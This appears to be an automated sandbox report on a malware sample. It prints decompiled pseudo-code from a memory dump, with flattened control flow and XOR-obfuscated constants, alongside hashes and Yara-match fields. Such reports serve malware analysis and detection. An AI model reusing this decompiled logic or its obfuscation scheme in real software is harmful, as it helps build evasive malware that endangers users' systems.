				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0024023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00238736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00242674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0023F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00238736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0023F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}
















































                                                      0x00235b79
                                                      0x00235b79
                                                      0x00235b80
                                                      0x00235b84
                                                      0x00235b88
                                                      0x00235b92
                                                      0x00235b99
                                                      0x00235ba1
                                                      0x00235ba9
                                                      0x00235bae
                                                      0x00235bb6
                                                      0x00235bbe
                                                      0x00235bc6
                                                      0x00235bce
                                                      0x00235bd6
                                                      0x00235bde
                                                      0x00235be7
                                                      0x00235beb
                                                      0x00235bf0
                                                      0x00235bfd
                                                      0x00235c02
                                                      0x00235c08
                                                      0x00235c10
                                                      0x00235c18
                                                      0x00235c1d
                                                      0x00235c25
                                                      0x00235c2d
                                                      0x00235c35
                                                      0x00235c3a
                                                      0x00235c47
                                                      0x00235c48
                                                      0x00235c4c
                                                      0x00235c54
                                                      0x00235c5c
                                                      0x00235c61
                                                      0x00235c69
                                                      0x00235c6e
                                                      0x00235c76
                                                      0x00235c7e
                                                      0x00235c86
                                                      0x00235c8e
                                                      0x00235c96
                                                      0x00235c9e
                                                      0x00235ca6
                                                      0x00235cae
                                                      0x00235cb6
                                                      0x00235cbe
                                                      0x00235cc6
                                                      0x00235cce
                                                      0x00235cd6
                                                      0x00235cde
                                                      0x00235ce6
                                                      0x00235cee
                                                      0x00235cf6
                                                      0x00235cfb
                                                      0x00235d03
                                                      0x00235d11
                                                      0x00235d15
                                                      0x00235d1d
                                                      0x00235d25
                                                      0x00235d32
                                                      0x00235d36
                                                      0x00235d3b
                                                      0x00235d43
                                                      0x00235d4d
                                                      0x00235d5b
                                                      0x00235d60
                                                      0x00235d66
                                                      0x00235d6e
                                                      0x00235d76
                                                      0x00235d7e
                                                      0x00235d82
                                                      0x00235d8a
                                                      0x00235d92
                                                      0x00235d9a
                                                      0x00235da2
                                                      0x00235daf
                                                      0x00235db0
                                                      0x00235db4
                                                      0x00235db8
                                                      0x00235dbc
                                                      0x00235dc4
                                                      0x00235dcc
                                                      0x00235dda
                                                      0x00235dde
                                                      0x00235de7
                                                      0x00235deb
                                                      0x00235df3
                                                      0x00235df7
                                                      0x00235e09
                                                      0x00235e66
                                                      0x00235e68
                                                      0x00235e6b
                                                      0x00235e71
                                                      0x00235f29
                                                      0x00000000
                                                      0x00235e77
                                                      0x00235e77
                                                      0x00235e7d
                                                      0x00000000
                                                      0x00235e83
                                                      0x00235e87
                                                      0x00235e89
                                                      0x00235e8d
                                                      0x00235e8f
                                                      0x00000000
                                                      0x00235e91
                                                      0x00235e95
                                                      0x00235ea0
                                                      0x00235ea1
                                                      0x00235ea2
                                                      0x00235eab
                                                      0x00235eb1
                                                      0x00000000
                                                      0x00235eb3
                                                      0x00235ec6
                                                      0x00235ed8
                                                      0x00235edd
                                                      0x00235edf
                                                      0x00235ee2
                                                      0x00235ee9
                                                      0x00235eec
                                                      0x00235ef0
                                                      0x00235ef4
                                                      0x00000000
                                                      0x00235ef6
                                                      0x00000000
                                                      0x00235ef6
                                                      0x00235ef4
                                                      0x00235eb1
                                                      0x00235e8f
                                                      0x00235e7d
                                                      0x00235e0b
                                                      0x00235e11
                                                      0x00235f00
                                                      0x00235f06
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00235e17
                                                      0x00235e1b
                                                      0x00235e28
                                                      0x00235e29
                                                      0x00235e2c
                                                      0x00235e31
                                                      0x00235e37
                                                      0x00235f0c
                                                      0x00235f0c
                                                      0x00235f12
                                                      0x00235f2d
                                                      0x00235f3a
                                                      0x00235f14
                                                      0x00235f14
                                                      0x00235f1a
                                                      0x00235f1c
                                                      0x00235f1c
                                                      0x00235e3d
                                                      0x00235e3d
                                                      0x00235e41
                                                      0x00235e43
                                                      0x00235e43
                                                      0x00235e47
                                                      0x00000000
                                                      0x00235e47
                                                      0x00235e37
                                                      0x00235e11
                                                      0x00235f28
                                                      0x00235f28
                                                      0x00235efb
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b-$bA$l'$z#
                                                      • API String ID: 0-3285866504
                                                      • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                                      • Instruction ID: f40d58a301268e945a23b9e3aabd25d160faf049ba719d1082dafa4c6824e860
                                                      • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                                      • Instruction Fuzzy Hash: 2DA130B15187829FD368CF69C48980FBBE1BBC4718F548A1DF59587260D3B4DA098F83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002380BA, Relevance: 5.1, Strings: 4, Instructions: 138COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E002380BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0023602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0024360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00238736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002450F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002461B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00237998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}























                                                      0x002380c0
                                                      0x002380c8
                                                      0x002380c9
                                                      0x002380d0
                                                      0x002380d3
                                                      0x002380d4
                                                      0x002380d9
                                                      0x002380e1
                                                      0x002380e4
                                                      0x002380eb
                                                      0x002380f3
                                                      0x002380f8
                                                      0x0023810c
                                                      0x0023810d
                                                      0x00238111
                                                      0x00238116
                                                      0x0023811e
                                                      0x00238126
                                                      0x0023812a
                                                      0x00238132
                                                      0x0023813a
                                                      0x00238142
                                                      0x0023814a
                                                      0x00238152
                                                      0x00238160
                                                      0x00238164
                                                      0x0023816c
                                                      0x00238179
                                                      0x0023817d
                                                      0x00238185
                                                      0x0023818d
                                                      0x00238192
                                                      0x00238197
                                                      0x0023819f
                                                      0x002381a7
                                                      0x002381ac
                                                      0x002381b4
                                                      0x002381bc
                                                      0x002381c4
                                                      0x002381cc
                                                      0x002381d4
                                                      0x002381dc
                                                      0x002381e4
                                                      0x002381ec
                                                      0x002381f4
                                                      0x002381f9
                                                      0x00238201
                                                      0x0023820e
                                                      0x00238212
                                                      0x0023821c
                                                      0x0023821c
                                                      0x0023822e
                                                      0x002382c8
                                                      0x002382cd
                                                      0x002382d0
                                                      0x00000000
                                                      0x00238234
                                                      0x0023823a
                                                      0x0023829d
                                                      0x0023829e
                                                      0x002382a2
                                                      0x002382a7
                                                      0x002382ab
                                                      0x002382ad
                                                      0x002382af
                                                      0x00000000
                                                      0x002382af
                                                      0x0023823c
                                                      0x0023823e
                                                      0x00238282
                                                      0x00238287
                                                      0x0023828a
                                                      0x00000000
                                                      0x00238240
                                                      0x00238246
                                                      0x00238267
                                                      0x0023826a
                                                      0x00000000
                                                      0x00238248
                                                      0x0023824e
                                                      0x00000000
                                                      0x00238254
                                                      0x00238254
                                                      0x00238256
                                                      0x0023825b
                                                      0x00000000
                                                      0x0023825b
                                                      0x0023824e
                                                      0x00238246
                                                      0x0023823e
                                                      0x0023823a
                                                      0x00000000
                                                      0x0023822e
                                                      0x002382ef
                                                      0x002382f4
                                                      0x002382f7
                                                      0x002382fc
                                                      0x002382fc
                                                      0x002382fc
                                                      0x00238309
                                                      0x0023830b
                                                      0x0023830f
                                                      0x0023830f
                                                      0x00238316

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +%$+%$XE$n(
                                                      • API String ID: 0-3838449085
                                                      • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                                      • Instruction ID: 9a908f72add2eaf95adf02977a606c566f141352fdc4931d8fd693337051bb70
                                                      • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                                      • Instruction Fuzzy Hash: 5A5166B01197429FC358DF20C88A82FBBF1BF84748F505A1DF5869A260D7B18A59CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00248D1C, Relevance: 5.1, Strings: 4, Instructions: 123COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00248D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002485BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0023E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00248D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00238736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00236636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

























                                                      0x00248d1f
                                                      0x00248d28
                                                      0x00248d2f
                                                      0x00248d3f
                                                      0x00248d44
                                                      0x00248d4a
                                                      0x00248d52
                                                      0x00248d5a
                                                      0x00248d5f
                                                      0x00248d67
                                                      0x00248d6f
                                                      0x00248d77
                                                      0x00248d7f
                                                      0x00248d87
                                                      0x00248d8f
                                                      0x00248d97
                                                      0x00248d9f
                                                      0x00248da7
                                                      0x00248daf
                                                      0x00248db7
                                                      0x00248dbf
                                                      0x00248dc7
                                                      0x00248dd3
                                                      0x00248dd8
                                                      0x00248dde
                                                      0x00248de6
                                                      0x00248dee
                                                      0x00248dfa
                                                      0x00248dff
                                                      0x00248e09
                                                      0x00248e0c
                                                      0x00248e10
                                                      0x00248e18
                                                      0x00248e20
                                                      0x00248e28
                                                      0x00248e30
                                                      0x00248e38
                                                      0x00248e40
                                                      0x00248e45
                                                      0x00248e51
                                                      0x00248e56
                                                      0x00248e5a
                                                      0x00248e5c
                                                      0x00248e64
                                                      0x00248e6c
                                                      0x00248e74
                                                      0x00248e79
                                                      0x00248e7c
                                                      0x00248e92
                                                      0x00248e94
                                                      0x00248e9c
                                                      0x00248ea2
                                                      0x00248ea9
                                                      0x00248eaf
                                                      0x00248eb5
                                                      0x00248ebe
                                                      0x00248ecc
                                                      0x00248ecd
                                                      0x00248ed8
                                                      0x00248ede
                                                      0x00248ee5
                                                      0x00248ef0
                                                      0x00248ef5
                                                      0x00248efc
                                                      0x00248f02
                                                      0x00248f02
                                                      0x00248ede
                                                      0x00248ebe
                                                      0x00248ea9
                                                      0x00248f0e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /$4A3$9*$oMt
                                                      • API String ID: 0-1186868077
                                                      • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                                      • Instruction ID: 48acea688c4007531ed03294033ddda8ed6829c766865f32edfdf92098ab259e
                                                      • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                                      • Instruction Fuzzy Hash: 725154716183429FD358CF25D48A90FFBE1FB98358F204A1CF49996260C7B4DA59CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00232A30, Relevance: 5.1, Strings: 4, Instructions: 108COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00232A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00242349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0023F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00242025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}























                                                      0x00232a36
                                                      0x00232a3f
                                                      0x00232a46
                                                      0x00232a53
                                                      0x00232a58
                                                      0x00232a5d
                                                      0x00232a64
                                                      0x00232a6f
                                                      0x00232a72
                                                      0x00232a75
                                                      0x00232a78
                                                      0x00232a7f
                                                      0x00232a86
                                                      0x00232a8d
                                                      0x00232a94
                                                      0x00232a9b
                                                      0x00232aa6
                                                      0x00232aa9
                                                      0x00232ab0
                                                      0x00232ab7
                                                      0x00232abe
                                                      0x00232aca
                                                      0x00232acb
                                                      0x00232ad0
                                                      0x00232adf
                                                      0x00232ae2
                                                      0x00232ae9
                                                      0x00232af5
                                                      0x00232af8
                                                      0x00232aff
                                                      0x00232b06
                                                      0x00232b0d
                                                      0x00232b14
                                                      0x00232b1b
                                                      0x00232b22
                                                      0x00232b26
                                                      0x00232b2a
                                                      0x00232b31
                                                      0x00232b38
                                                      0x00232b3f
                                                      0x00232b46
                                                      0x00232b4d
                                                      0x00232b54
                                                      0x00232b58
                                                      0x00232b5f
                                                      0x00232b66
                                                      0x00232b6d
                                                      0x00232b77
                                                      0x00232b7a
                                                      0x00232b7c
                                                      0x00232b8f
                                                      0x00232b9d
                                                      0x00232bb2
                                                      0x00232bbe
                                                      0x00232bcd
                                                      0x00232bd3
                                                      0x00232bda

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +/F$18$^$s
                                                      • API String ID: 0-1171060364
                                                      • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                                      • Instruction ID: e2164e15692062245ebe3d6e82817479502e3cdd1ce4b78a57f7aeaccf719db0
                                                      • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                                      • Instruction Fuzzy Hash: E351F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002473AC, Relevance: 4.0, Strings: 3, Instructions: 219COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E002473AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00249465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0024340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002489D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
